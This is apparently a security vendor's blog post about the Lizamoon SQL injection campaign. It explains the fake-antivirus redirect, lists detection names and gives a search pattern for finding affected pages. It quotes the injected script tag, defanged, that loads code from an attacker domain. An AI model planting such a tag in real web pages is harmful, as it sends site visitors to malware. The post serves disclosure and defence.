What’s the deal with the Lizamoon SQL injection?

The moon at about 3/4 phase

The moon at about 3/4 phase
There has been a large amount of press in the last few days regarding lizamoon. The following code was injected into a large number of websites:

<script src=hxxp://lizamoon . com / ur . php >

At the time of writing, various other domains are being used, not just lizamoon.

The script that is loaded from the compromised web pages redirects the user to a malicious site. Ultimately, the attack is intended to infect users with fake AV (scareware). The distribution sites used typically use the “.cc” (Cocos Islands) or “.in” (India) TLDs.

Sophos Perspective

SophosLabs have been monitoring these attacks and have protected customers in several ways:

  • detecting the fake AV pages as Mal/FakeAVJS-A
  • detecting the fake AV payload as Mal/FakeAV-IP
  • blocking access to the known sites used in this attack with URL filtering at the endpoint and web gateway

Additionally, detection for web pages injected with the malicious script element has been released today as Troj/Badsrc-L.

Current scope of the problem

If you do a Google search for:

"<script src=http://*/ur.php"

you get a large number of hits.

This frightening volume may be a little misleading, since the total is inflated by occurrences of the following HTML within the compromised web pages:

&lt;script src=hxxp://lizamoon . com / ur . php &gt;

As you can see, the injected code has been escaped in some cases, rendering the injection harmless.